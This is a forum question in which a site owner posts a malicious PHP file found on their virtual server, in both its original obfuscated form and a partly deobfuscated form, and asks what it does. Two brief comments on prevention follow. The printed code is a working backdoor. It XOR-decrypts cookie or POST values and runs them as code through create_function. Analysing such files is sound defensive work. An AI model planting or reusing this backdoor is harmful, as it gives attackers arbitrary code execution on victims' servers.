# Unwinding PHP Hack

Tags: php, security, deobfuscation

I found a file on a virtual server and am curious what it is. I am certain it is malicious, but not sure what is compromised, or how much they could do with this. I have seen others in the past that provide full database and file access, but this is much different. I have worked to deobfuscate it as much as I could figure out. Here is the easy version:

```
<?php

$auuhct = Array("create_function", "f70414e8-ea6a-4e12-b964-368b7762b896","H*", "#", "count", "str_repeat", "explode","substr","array_merge","strlen","pack"  );

foreach (array_merge($_COOKIE, $_POST) as $key => $value){
    function jybgy($auuhct, $key, $lcprx){
        return substr(str_repeat($key . "f70414e8-ea6a-4e12-b964-368b7762b896", ($lcprx / strlen($key)) + 1), 0, $lcprx);
    }
    function mgfug($auuhct, $opazmvt){
        return @pack("H*", $opazmvt);
    }
    function wvckbs($auuhct, $opazmvt){
        $gtatuki = count($opazmvt) % 3;
        if (!$gtatuki) {
             $pemcz = create_function("", $opazmvt[1]($opazmvt[2]));
            $pemcz();
            exit();
        }
    }
    $value = mgfug($auuhct, $value);
wvckbs($auuhct, explode("#", $value ^ jybgy($auuhct, $key, strlen($value))));
}
```

Here is the original:

```
<?php
$iwfxvw = 'fHc*4v0d283_s\'-ta91lp7gkibermo#uny6x';

$auuhct = Array();

$auuhct[] = $iwfxvw[2] . $iwfxvw[27] . $iwfxvw[26] . $iwfxvw[16] . $iwfxvw[15] . $iwfxvw[26] . $iwfxvw[11] . $iwfxvw[0] . $iwfxvw[31] . $iwfxvw[32] . $iwfxvw[2] . $iwfxvw[15] . $iwfxvw[24] . $iwfxvw[29] . $iwfxvw[32];
$auuhct[] = $iwfxvw[0] . $iwfxvw[21] . $iwfxvw[6] . $iwfxvw[4] . $iwfxvw[18] . $iwfxvw[4] . $iwfxvw[26] . $iwfxvw[9] . $iwfxvw[14] . $iwfxvw[26] . $iwfxvw[16] . $iwfxvw[34] . $iwfxvw[16] . $iwfxvw[14] . $iwfxvw[4] . $iwfxvw[26] . $iwfxvw[18] . $iwfxvw[8] . $iwfxvw[14] . $iwfxvw[25] . $iwfxvw[17] . $iwfxvw[34] . $iwfxvw[4] . $iwfxvw[14] . $iwfxvw[10] . $iwfxvw[34] . $iwfxvw[9] . $iwfxvw[25] . $iwfxvw[21] . $iwfxvw[21] . $iwfxvw[34] . $iwfxvw[8] . $iwfxvw[25] . $iwfxvw[9] . $iwfxvw[17] . $iwfxvw[34];
$auuhct[] = $iwfxvw[1] . $iwfxvw[3];
$auuhct[] = $iwfxvw[30];
$auuhct[] = $iwfxvw[2] . $iwfxvw[29] . $iwfxvw[31] . $iwfxvw[32] . $iwfxvw[15];
$auuhct[] = $iwfxvw[12] . $iwfxvw[15] . $iwfxvw[27] . $iwfxvw[11] . $iwfxvw[27] . $iwfxvw[26] . $iwfxvw[20] . $iwfxvw[26] . $iwfxvw[16] . $iwfxvw[15];
$auuhct[] = $iwfxvw[26] . $iwfxvw[35] . $iwfxvw[20] . $iwfxvw[19] . $iwfxvw[29] . $iwfxvw[7] . $iwfxvw[26];
$auuhct[] = $iwfxvw[12] . $iwfxvw[31] . $iwfxvw[25] . $iwfxvw[12] . $iwfxvw[15] . $iwfxvw[27];
$auuhct[] = $iwfxvw[16] . $iwfxvw[27] . $iwfxvw[27] . $iwfxvw[16] . $iwfxvw[33] . $iwfxvw[11] . $iwfxvw[28] . $iwfxvw[26] . $iwfxvw[27] . $iwfxvw[22] . $iwfxvw[26];
$auuhct[] = $iwfxvw[12] . $iwfxvw[15] . $iwfxvw[27] . $iwfxvw[19] . $iwfxvw[26] . $iwfxvw[32];
$auuhct[] = $iwfxvw[20] . $iwfxvw[16] . $iwfxvw[2] . $iwfxvw[23];
foreach ($auuhct[8]($_COOKIE, $_POST) as $lfwzp => $mdvvnjb)
{
    function jybgy($auuhct, $lfwzp, $lcprx)
    {
        return $auuhct[7]($auuhct[5]($lfwzp . $auuhct[1], ($lcprx / $auuhct[9]($lfwzp)) + 1) , 0, $lcprx);
    }
    function mgfug($auuhct, $opazmvt)
    {
        return @$auuhct[10]($auuhct[2], $opazmvt);
    }
    function wvckbs($auuhct, $opazmvt)
    {
        $gtatuki = $auuhct[4]($opazmvt) % 3;
        if (!$gtatuki)
        {
            $heemr = $auuhct[0];
            $pemcz = $heemr("", $opazmvt[1]($opazmvt[2]));
            $pemcz();
            exit();
        }
    }
    $mdvvnjb = mgfug($auuhct, $mdvvnjb);
    wvckbs($auuhct, $auuhct[6]($auuhct[3], $mdvvnjb ^ jybgy($auuhct, $lfwzp, $auuhct[9]($mdvvnjb))));
}
```

Comment: As interesting as the particular malware may be, the main problem you need to solve is keeping them from showing up on the server in the first place.  As long as people can put executable files there, exactly what a particular one does is not really all that important.

Comment: I completely agree, I do love however hacker's ability to cram massive functionality into 2k worth of obfuscated code. Understanding what is going on helps me do more on my own projects, and also secure things better. I expect it was a bad wordpress plugin.